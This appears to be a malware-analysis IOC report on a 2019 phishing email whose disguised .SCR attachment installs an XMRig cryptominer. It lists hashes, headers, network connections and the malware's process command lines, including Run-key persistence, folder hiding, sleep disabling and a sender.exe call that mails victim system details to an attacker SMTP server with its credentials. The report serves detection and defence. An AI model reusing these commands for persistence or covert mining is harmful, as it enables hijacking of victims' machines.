- #IOC #OptiData #VR #xmrig #bmcon #coinminer #SCR #UPX
- https://pastebin.com/LjHZHhc4
- previous_contact:
- https://pastebin.com/eTPuCkhC
- FAQ:
- https://github.com/xmrig/xmrig
- attack_vector
- --------------
- email attach .RAR > .SCR > C:\Intel\*.exe
- email_headers
- --------------
- Received: from s02.spamexperts.axc.nl (s02.spamexperts.axc.nl [185.182.56.112])
- Received: from vserver384.axc.nl ([185.182.56.51])
- Received: from [185.155.99.35] (helo=46-211-54-11.mobile.kyivstar.net)
- From: Бухгалтерія <mail@fin-director.nl>
- Subject: Доброго дня
- To: "user00" <user00@victim1.com>
- Date: Mon, 2 Sep 2019 05:14:31 +0300
- X-Originating-IP: 185.182.56.51
- X-SpamExperts-Domain: vserver384.axc.nl
- files
- --------------
- SHA-256 021db462fbc53a63aa08361ac18e5854ef70ba14151d108f74672540d3c880e9
- File name 1C - плaтiжнe дopучeння №47620205757176 - 2019.rar [RAR archive data, v34]
- File size 983.41 KB (1007012 bytes)
- SHA-256 067f96ee758cc572a281bc7608e6619a50f43bf94f66245578967dadf414ca8b
- File name 1C - плaтiжнe дopучeння №47620205757176 - 2019.scr [PE32 executable (GUI) Intel 80386, for MS Windows]
- File size 1.02 MB (1066275 bytes)
- SHA-256 40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34
- File name bmcon.exe [PE32 executable (console) Intel 80386, for MS Windows, UPX compressed]
- File size 354.5 KB (363008 bytes)
- SHA-256 d782ffbccbae28228a49fbf86e5c62966f7f9f507c9054fee462c2d53f84cd94
- File name bmcon.exe [PE32 executable (console) Intel 80386, for MS Windows]
- File size 1.31 MB (1370624 bytes)
- activity
- **************
- netwrk
- --------------
- [ssl]
- 88.99.38.225 dl.browsermine.com Client Hello
- [http]
- 13.107.4.50 ctldl.windowsupdate.com GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?698df6719eccbc04 HTTP/1.1 Microsoft-CryptoAPI/6.1
- 77.120.60.192 isrg.trustid.ocsp.identrust.com GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1 Microsoft-CryptoAPI/6.1
- 77.120.60.187 ocsp.int-x3.letsencrypt.org GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgOEzWC36QVDJo6DaBgPQDAh%2Bw%3D%3D HTTP/1.1 Microsoft-CryptoAPI/6.1
- 93.184.221.240 ctldl.windowsupdate.com GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?3b835bcf15aa1abf HTTP/1.1 Microsoft-CryptoAPI/6.1
- 77.120.60.201 crl.microsoft.com GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1 Microsoft-CryptoAPI/6.1
- comp
- --------------
- bmcon.exe 2308 TCP localhost 49248 88.99.38.225 443 ESTABLISHED
- bmcon.exe 2308 TCP localhost 49249 13.107.4.50 80 ESTABLISHED
- bmcon.exe 2308 TCP localhost 49250 77.120.60.192 80 ESTABLISHED
- bmcon.exe 2308 TCP localhost 49251 77.120.60.187 80 ESTABLISHED
- bmcon.exe 2308 TCP localhost 49252 88.99.38.225 443 ESTABLISHED
- bm-xmrig.exe 2696 TCP localhost 49253 159.69.189.115 4444 ESTABLISHED
- proc
- --------------
- "C:\Users\operator\Desktop\1C - плaтiжнe дopучeння №47620205757176 - 2019.scr" /S
- "C:\Users\operator\Desktop\1C - плaтiжнe дopучeння №47620205757176 - 2019.scr" /S
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\Intel\enable.cmd" "
- C:\Windows\SysWOW64\reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "╨Ш╨╜╤В╨╡╨│╤А╨╕╤А╨╛╨▓╨░╨╜╨╜╤Л╨╡_╨┤╤А╨░╨╣╨▓╨╡╤А╨░" /f
- C:\Windows\SysWOW64\powercfg.exe powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
- C:\Windows\SysWOW64\powercfg.exe powercfg -change -standby-timeout-ac 0
- C:\Windows\SysWOW64\powercfg.exe powercfg -change -hibernate-timeout-ac 0
- C:\Windows\SysWOW64\powercfg.exe powercfg -h off
- C:\Windows\SysWOW64\attrib.exe ATTRIB +s +h C:\Intel
- C:\Windows\SysWOW64\attrib.exe C:\Windows\SysWOW64\attrib.exe
- C:\Windows\SysWOW64\cmd.exe /c ver
- C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .
- C:\Windows\SysWOW64\Wbem\WMIC.exe WMIC CPU Get Name /Value
- C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
- C:\Windows\SysWOW64\Wbem\WMIC.exe WMIC /Node:localhost Path Win32_VideoController Get Name /Value
- C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\sender.rar sender.exe C:\ntel\sender.exe /y
- C:\Intel\sender.exe -to recipient@office-center.site -f "Robot4<sender2@office-center.site>" -server smtp.office-center.site -port 587 -u sender2@office-center.site -pw epsiloneridana -subject "host1/user1" -body "OS-WindowsX x64/CPU-Intel(R) CPU @ 2.20GHz/Cores-2/GPU-VGA"
- C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v private /t reg_sz /d "C:\Intel\privat.exe" /f
- C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\sender.rar privat.exe C:\ntel\privat.exe /y
- C:\Windows\SysWOW64\PING.EXE ping -n 3600 127.0.0.1
- "C:\Intel\driver.exe" e -hplimpid2903392 C:\Intel\sender.rar bmcon.exe C:\ntel\bmcon.exe /y
- "C:\Intel\bmcon.exe"
- "C:\Intel\bmcon\bmstart.exe" --conf="C:\Intel\bmcon.json"
- "C:\Intel\bmcon\bm-xmrig.exe"
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 02.09.2019 13:29
- 1) BMCon
- c:\intel\bmcon.exe 03.11.2018 3:42
- 2) private 17.229.13.523.351 18.14.13.5356 Installation 17.19.11.15
- c:\intel\privat.exe 20.06.1992 1:22
- drop
- --------------
- C:\Intel\bmcon.exe
- C:\Intel\bmcon.json
- C:\Intel\driver.exe
- C:\Intel\privat.exe
- C:\Intel\sender.exe
- C:\Intel\sender.rar
- ...
- C:\Intel\bmcon\apps.json
- C:\Intel\bmcon\bmstart.exe
- C:\Intel\bmcon\bm-xmrig.exe
- C:\Intel\bmcon\bm-xmrig.json
- # # #
- https://www.virustotal.com/gui/file/021db462fbc53a63aa08361ac18e5854ef70ba14151d108f74672540d3c880e9/details
- https://www.virustotal.com/gui/file/067f96ee758cc572a281bc7608e6619a50f43bf94f66245578967dadf414ca8b/details
- https://www.virustotal.com/gui/file/40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34/details
- https://www.virustotal.com/gui/file/d782ffbccbae28228a49fbf86e5c62966f7f9f507c9054fee462c2d53f84cd94/details
- https://analyze.intezer.com/#/analyses/8b188ab9-9120-46ae-80b9-a811dd9d73e2
- https://analyze.intezer.com/#/analyses/2b2add43-448a-4c8e-984c-b49c805873a3
- https://analyze.intezer.com/#/analyses/cba2a28c-10df-491c-b5f9-7e974cde1df0
- VR
- @